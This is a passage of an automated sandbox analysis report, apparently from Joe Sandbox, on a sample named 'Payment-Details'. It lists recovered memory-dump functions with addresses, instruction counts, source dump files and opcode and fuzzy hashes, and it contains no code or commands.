                                        • API String ID:
                                        • Opcode ID: 24f452f9a8fad3e0eee40fb8a823b096c1b6d2371ba0f8930d24cbf3cae7d21e
                                        • Instruction ID: 3fd87b664f82ed44f82c9bf78ab81c8bc6e687223a1a64f0037605293641f57d
                                        • Opcode Fuzzy Hash: 24f452f9a8fad3e0eee40fb8a823b096c1b6d2371ba0f8930d24cbf3cae7d21e
                                        • Instruction Fuzzy Hash: 07F05E793006019FC314DB19D454D2AB7AAEFC8721B11816AFA46CB370CA75EC02CB90
                                        Function 0725734D Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2963bd482d78794933334c1957d279b2aa90a5c1eb797f33089202a9cc8426e
                                        • Instruction ID: 3f27feb0d5a64d31298a9d51fe5af155a27b797cdd9a25dacfe726a20374f0a2
                                        • Opcode Fuzzy Hash: c2963bd482d78794933334c1957d279b2aa90a5c1eb797f33089202a9cc8426e
                                        • Instruction Fuzzy Hash: AF01A8749102188BC760DFA9D894799BBB2FB4A325F108295D919B7394C7309D85CF61
                                        Function 070EA088 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 319949aa62c001746b0f1a86c39d43d7875bc6eda41006595d5730352f3b4846
                                        • Instruction ID: e895e31f63b722ed0825c6a6a3d377a8fdb1d3c605b6f6a935495a52140724f7
                                        • Opcode Fuzzy Hash: 319949aa62c001746b0f1a86c39d43d7875bc6eda41006595d5730352f3b4846
                                        • Instruction Fuzzy Hash: 26F0BEB4908248AFC701CB74D8416EDBFF9EF0A300F14C1DAE84497252C6349A85CBA1
                                        Function 066F34B0 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5a038dc4204368e60727f1723bd64cc04b18bc8f928881b1087b9df2615aabd
                                        • Instruction ID: e7363d8f5b99dcb044cca5506e979258c2dc3b364ea5868ffab75599ed995979
                                        • Opcode Fuzzy Hash: f5a038dc4204368e60727f1723bd64cc04b18bc8f928881b1087b9df2615aabd
                                        • Instruction Fuzzy Hash: 4CF05875E00208FFCB41CF94D841A9DBBB6FB49310F10C0A9FD4562350C7329A62EB91
                                        Function 0723D880 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05bc30389197649b6fb1a2207301e00a479d3dbef681050a8f339ec6ab12fbac
                                        • Instruction ID: d239b014eb7733b3185f168707ab5d757c010e40ed6b86529512bd78c4c5b782
                                        • Opcode Fuzzy Hash: 05bc30389197649b6fb1a2207301e00a479d3dbef681050a8f339ec6ab12fbac
                                        • Instruction Fuzzy Hash: 5DF082B091A248BFCF45DF78C8549EDBFB4EB4A214F14C1EAE844D7351C2319A56DB50
                                        Function 07257651 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 655768f2a4e3c491a8d1a0fe435dba77a748404af1987e4fa42b1e0a73d4269b
                                        • Instruction ID: 1e34eb278f4e6dc3a1e4a9621fbadae92759970a55cedc8a3cbeaeba172e69ba
                                        • Opcode Fuzzy Hash: 655768f2a4e3c491a8d1a0fe435dba77a748404af1987e4fa42b1e0a73d4269b
                                        • Instruction Fuzzy Hash: A5F0A0B0819305AFC740DFA8D851698BFF4EB09200F2041AAC849C3362DB308A46CB51
                                        Function 070E9E99 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd46ad958c017c3ed1f43a9c2fce31b3f374eaffd25ad6b80f50c7e6ab96eb26
                                        • Instruction ID: 3600810a7191016487b1262956a37a223041246501c2948ec9e28ed8e5745f28
                                        • Opcode Fuzzy Hash: fd46ad958c017c3ed1f43a9c2fce31b3f374eaffd25ad6b80f50c7e6ab96eb26
                                        • Instruction Fuzzy Hash: 2AF08C74819345AFC740DFA8D846A99BFF8EF06204F2000E5E844D7362E7349980CBA2
                                        Function 019F6B27 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 532125ce6c27353905a8ab2847826b348ece3eb5c57107e002950d839f1cfc56
                                        • Instruction ID: c7302f3e6d69295f24abcb826fbcc19e006a0333cace52a433f8b5283ced6a1a
                                        • Opcode Fuzzy Hash: 532125ce6c27353905a8ab2847826b348ece3eb5c57107e002950d839f1cfc56
                                        • Instruction Fuzzy Hash: 1FF0E7B0D1830A9FDB94DFA9C545AAEBBF4AB48310F1044AED618E7201E3748640CBA1
                                        Function 07233B90 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13f8d75083ef82f442f04b28e9fac283d7fd87322ccdf71269618f81190fc143
                                        • Instruction ID: 3919db5c21e6e76de948f053789406e0abf9853649915d5945078d64abfe8998
                                        • Opcode Fuzzy Hash: 13f8d75083ef82f442f04b28e9fac283d7fd87322ccdf71269618f81190fc143
                                        • Instruction Fuzzy Hash: E4E0E5B2F083546BD72196659810BAEBBD68BC1720F0080EAD808DB2C1E9B9590187AA
                                        Function 0723D248 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4fe8c0c668bde9dff870fb3f36b98707d8a7908c701560c9141f86f60fc0656
                                        • Instruction ID: f28398a0ca7e2cd2d15086af2b478b20d7feb99a9a776b8fda335b6078db0db7
                                        • Opcode Fuzzy Hash: f4fe8c0c668bde9dff870fb3f36b98707d8a7908c701560c9141f86f60fc0656
                                        • Instruction Fuzzy Hash: 41F0A7B4D09344BFCB56CBA4D845AADBBB4EB46300F1080DED84497393C7309E46CB91
                                        Function 0723F1D0 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 222aa918e00db09377a36d6f4eea7cee5953252ceca9c8c721b734aaf0c309b9
                                        • Instruction ID: a66fa3dc24a739688fff3713698ca85198138e80ea90b6494efb6df34858df33
                                        • Opcode Fuzzy Hash: 222aa918e00db09377a36d6f4eea7cee5953252ceca9c8c721b734aaf0c309b9
                                        • Instruction Fuzzy Hash: 49F0A7B0D19384AFC782DBB8DD45259BFF4DB07200F6541DDD849C7252D6309E41C752
                                        Function 07257D0A Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b59cb1ae24fc77b28e679779ce6db55618ec8c977b1fc902e330a69843087bc
                                        • Instruction ID: 270a860a3fcd12ad039e124387939180f1feaf01ed8a37862659e01ae2b44a33
                                        • Opcode Fuzzy Hash: 7b59cb1ae24fc77b28e679779ce6db55618ec8c977b1fc902e330a69843087bc
                                        • Instruction Fuzzy Hash: 54F05E70D19388AFC741CFB8C8552ACBFF0EF4A214F1480DAD88897352D2355946CB41
                                        Function 07255415 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3336b36eddebe7b7f7f902e743cad0c0f165f096bb15441b91c6ee4734b57d10
                                        • Instruction ID: 2f60edafa70e9c3ee9187145c32ed2dd568b9198361326769dda967f0380fa62
                                        • Opcode Fuzzy Hash: 3336b36eddebe7b7f7f902e743cad0c0f165f096bb15441b91c6ee4734b57d10
                                        • Instruction Fuzzy Hash: 14014BB4A152288FDB64DF28DD587C9BBB2BB49301F0080E9D809A3251D7B01E80CF42
                                        Function 070EED08 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fafecd25c7977dd1aaeebeed4e42b49abbc349ea4a1cd7245e16e183674d63bd
                                        • Instruction ID: 4a08102b1d53ec4a064daed17ad11a6a00d70469c2d239e3bc256b994f81ca32
                                        • Opcode Fuzzy Hash: fafecd25c7977dd1aaeebeed4e42b49abbc349ea4a1cd7245e16e183674d63bd
                                        • Instruction Fuzzy Hash: 94E0A0316003069BE710A62AEC84C4BFBAEFFD0321B108A36E41A47225CEB8AC0587D1
                                        Function 070EB2E5 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbd64afd1880d51d3a0ba0637d2f3a651e5033a793556282bf073fa922bdeb49
                                        • Instruction ID: db706ed4c79156b2a8dfdf7e85fbe4b84265ba8943b965ddabe8842381c64951
                                        • Opcode Fuzzy Hash: bbd64afd1880d51d3a0ba0637d2f3a651e5033a793556282bf073fa922bdeb49
                                        • Instruction Fuzzy Hash: B901C0B4D14308CFEB14CFA4D589BADBBF6EB48304F109296E509A7261DB385980CF01
                                        Function 070E4161 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26c5cdd72e530b89d6dd252a5cf5bfbf6ceba5f87bcaa224bf1745af4d4c3540
                                        • Instruction ID: 6f289e91b81ddb7079a85b1d40b0c262f0ca02731d23acc59333743be9910ed4
                                        • Opcode Fuzzy Hash: 26c5cdd72e530b89d6dd252a5cf5bfbf6ceba5f87bcaa224bf1745af4d4c3540
                                        • Instruction Fuzzy Hash: A4F0A07480C344EFCB15CF54D850A9DBBB9EB06300F20819AE88417351C6314A52DB51
                                        Function 070E78D8 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2f8c1059bb2dc372366d7bbd8ed5ec1f6c1b3d6b34a3429a4705a83f583ff09
                                        • Instruction ID: efe5bacfcd068b04f32603fe570367a59a1cf93ea1245e5f18f320c8748905f8
                                        • Opcode Fuzzy Hash: b2f8c1059bb2dc372366d7bbd8ed5ec1f6c1b3d6b34a3429a4705a83f583ff09
                                        • Instruction Fuzzy Hash: D2E092B2806388EFD752EBB498147CB3BA9CF06114F1506EAD0859B022DE354A85D7A7
                                        Function 066F2878 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6169226c194e2a3642833ae9a536f08df7f3bbd9f8569883e6ab76df0078d8a
                                        • Instruction ID: 2182d567862a38157df552b70c24c84799bc43d159fff8708297a03b525019a4
                                        • Opcode Fuzzy Hash: b6169226c194e2a3642833ae9a536f08df7f3bbd9f8569883e6ab76df0078d8a
                                        • Instruction Fuzzy Hash: E2F0BE35C05208FFCB40CFA4C840AADBFBAEF49300F108099E85453360CA328AA2DF50
                                        Function 019F6B38 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f12251180065742a03f43708e0f6ad25222e11aaf1e8e60ff3425924a2cf93e
                                        • Instruction ID: 7d3466424f8a706fb812ff13737ac555298e13d7d4a0405cd8aa296545be47c0
                                        • Opcode Fuzzy Hash: 0f12251180065742a03f43708e0f6ad25222e11aaf1e8e60ff3425924a2cf93e
                                        • Instruction Fuzzy Hash: A4F0DAB0E0430EAFDB44DFA9C845AAEBBF4EB48311F1045ADDA18E7200D77095408B90
                                        Function 0723FE70 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d002370b0ea4fa5dba6604d8f82cd344a9930a81fa7f1156031ca967e49b63e
                                        • Instruction ID: d1e53243a2161b5fe456255e7a697116b4fb41a4331422502a62a18032b64120
                                        • Opcode Fuzzy Hash: 4d002370b0ea4fa5dba6604d8f82cd344a9930a81fa7f1156031ca967e49b63e
                                        • Instruction Fuzzy Hash: 4BF03AB5D09284AFCB85CFA8D85459DBFB0EB4A310F1482AAEC4497222D2364A56DB41
                                        Function 0723E6F8 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88a7b92914714b798deff361223a2c36114c72f2d5cd58b5618dbd246d454127
                                        • Instruction ID: 1a873d2c705fdebf29b5b5ae571deef1f4390feaa57deeaed69c975113cefeb7
                                        • Opcode Fuzzy Hash: 88a7b92914714b798deff361223a2c36114c72f2d5cd58b5618dbd246d454127
                                        • Instruction Fuzzy Hash: BBF0A7F5D18248BFC701DFA8D8506EDFFF9DB46200F1080AED84497351DA31AA46CB91
                                        Function 07256673 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af288d8da84e0e37729f8d96160120a515cbc3879c14fb189ab0f5d323d1d6b5
                                        • Instruction ID: add7234da9fc1a7f06def9df8c8647e78a64db34a326b641f75289c8854966c2
                                        • Opcode Fuzzy Hash: af288d8da84e0e37729f8d96160120a515cbc3879c14fb189ab0f5d323d1d6b5
                                        • Instruction Fuzzy Hash: 93F08CB0D0A349EFCB52DFA4D80069DBFB6EB06300F4082AAE81497251D7399A94DF91
                                        Function 070E3FB8 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07da51abf3cab35961fd215e454bb5879fd5e001530ef889edaada5d08bb60c4
                                        • Instruction ID: b2376d96448a7f79e8f093e4d1331501eadcf6958f3f539fb300fbc1581d6017
                                        • Opcode Fuzzy Hash: 07da51abf3cab35961fd215e454bb5879fd5e001530ef889edaada5d08bb60c4
                                        • Instruction Fuzzy Hash: 38F09B7580D204EFCB14DF55D85159DFFB8EF42310F2081DAD85467351D6315E46C7A1
                                        Function 070E9E08 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 752b0f18dfba215608d0aea20b3a7c878bc48bfb92c63dbd676a29f84bb27ef6
                                        • Instruction ID: ae1bccc1e9a5d46712da35dabcf07da679ff7ee212bdb625171120c50108cc6e
                                        • Opcode Fuzzy Hash: 752b0f18dfba215608d0aea20b3a7c878bc48bfb92c63dbd676a29f84bb27ef6
                                        • Instruction Fuzzy Hash: EDF0A07081A344AFC781DF78C84568CBFF8EF05214F1002E5D955D33A1E7319989CB52
                                        Function 070E52CB Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ecc582991d0687aab7c5959956bc7046fbfab37664c51c10f517f258dc526013
                                        • Instruction ID: 5464db0a56707aa34e073110756a3ecddad214fa615b6e13c99c6fcf532a2c32
                                        • Opcode Fuzzy Hash: ecc582991d0687aab7c5959956bc7046fbfab37664c51c10f517f258dc526013
                                        • Instruction Fuzzy Hash: 9BF0657450D308EFC711CF64DC559ADBFB9EB47304F10829ED85467351CA315A52D7A1
                                        Function 0723A839 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8450699b74d9fd838b1d506caf67a981d30f44910e2a3434e6fb3b3d2269455f
                                        • Instruction ID: d5f27d4a16b565846e91847b200b4abe0b47b3c59c1244c69b59b60a2cca825e
                                        • Opcode Fuzzy Hash: 8450699b74d9fd838b1d506caf67a981d30f44910e2a3434e6fb3b3d2269455f
                                        • Instruction Fuzzy Hash: 5DF0E5F0419385ABC751CB649C5466ABF79EF43100F1880DEEC8457252C6226D02D391
                                        Function 0723C045 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5c7b553aecd714dde004414843a5dc50d89e8115ac5ea0d872a16993df92f1a
                                        • Instruction ID: b0293b59ffee660e3a81a1a2d83bc2c51f78ba6f57929385d2cd5bf68e6bbe05
                                        • Opcode Fuzzy Hash: f5c7b553aecd714dde004414843a5dc50d89e8115ac5ea0d872a16993df92f1a
                                        • Instruction Fuzzy Hash: E3F037B0A50219CFDB54CF28CA93BA9B7F0FB5C700F1092A9990A9B255DA749D80CF41
                                        Function 0723C0CF Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 983861dcdffeeee0be9d4ac09b52fbfc9fbefaf007eb43932a31d799356dc8a1
                                        • Instruction ID: 40809e09efadec4c17d9f466e0274984ba97881951b1e5e6045a39d7475d6567
                                        • Opcode Fuzzy Hash: 983861dcdffeeee0be9d4ac09b52fbfc9fbefaf007eb43932a31d799356dc8a1
                                        • Instruction Fuzzy Hash: F3F0ECB4A412088FCB44CB68D597BADBBF5FB5C700F20912599069B355DA759C018B82
                                        Function 070E7930 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ad723a5fdc2010aadf689d983f39c4b175524b9d601507b09e1e4d607bd842e
                                        • Instruction ID: 15066490b0e72be7109e1c9f008acadf2a9bc9f54c1fea6bdd8e841c4156b1be
                                        • Opcode Fuzzy Hash: 4ad723a5fdc2010aadf689d983f39c4b175524b9d601507b09e1e4d607bd842e
                                        • Instruction Fuzzy Hash: 73F01CB4D04248EFCB80DFA9C840AADBBF9EF49310F14C1AAE868D3351D6359A51DF50
                                        Function 0723BB84 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bde67eafec444aa2606189cfd8ac8409b20666286478e859216d961d2e48d655
                                        • Instruction ID: fd9bb73c63bb421e0da220429fd43c175c4e31f39c928b93a60d2ad57559b5c7
                                        • Opcode Fuzzy Hash: bde67eafec444aa2606189cfd8ac8409b20666286478e859216d961d2e48d655
                                        • Instruction Fuzzy Hash: 7EF03774A00214CFCB50CF28DA96BA973F4EB4C300F2041A5D90A9B356DB355E908F81
                                        Function 0723C1D7 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 847992d15a4800a2178dda7a3828860615afef8b9e962a45c4abfd0f40b4f107
                                        • Instruction ID: 1585094a6cc7d73203145aa3c82c79f1ceda41e30996769be9645524d7fc5207
                                        • Opcode Fuzzy Hash: 847992d15a4800a2178dda7a3828860615afef8b9e962a45c4abfd0f40b4f107
                                        • Instruction Fuzzy Hash: 60F019B0A51214CFDB10CB28E996BEAB7F1FB4C700F1051A9D90A9B355DB359E458F81
                                        Function 0725D739 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ab37e259ead8a77e86ed9d482b3b0c8a5fae64ca71108d475d11e85ad30c9fa
                                        • Instruction ID: 52e51d5c569302f9b7742bf18a32fce5e73ce941165d597fd61718fecba5bea0
                                        • Opcode Fuzzy Hash: 2ab37e259ead8a77e86ed9d482b3b0c8a5fae64ca71108d475d11e85ad30c9fa
                                        • Instruction Fuzzy Hash: 2AF092B4D29388AFC741DFB8D88529CBFB4EF06200F2000E6C984D3252E7304E95C751
                                        Function 070E9E51 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a486fd2523522bb9cc76f474a4172c657bab988f772e5356fcf5ac1c3f3508f6
                                        • Instruction ID: 651110675ac35f431e7626aba31f5f5aff617ba385b394675ee12500ad628636
                                        • Opcode Fuzzy Hash: a486fd2523522bb9cc76f474a4172c657bab988f772e5356fcf5ac1c3f3508f6
                                        • Instruction Fuzzy Hash: 17F0657491D3449FC751DBB49845698BFF8DB05108F1041EAD945D2351D7705985C7A2
                                        Function 070E2250 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18c92065da4ae6c7871d1cffb6455adf69997ff1dae5dccdfb6460e456a738f0
                                        • Instruction ID: bc137ed5b33ad18a713d5f8ead21eaf8bbae02ad787301cc43471bc552d7fcdd
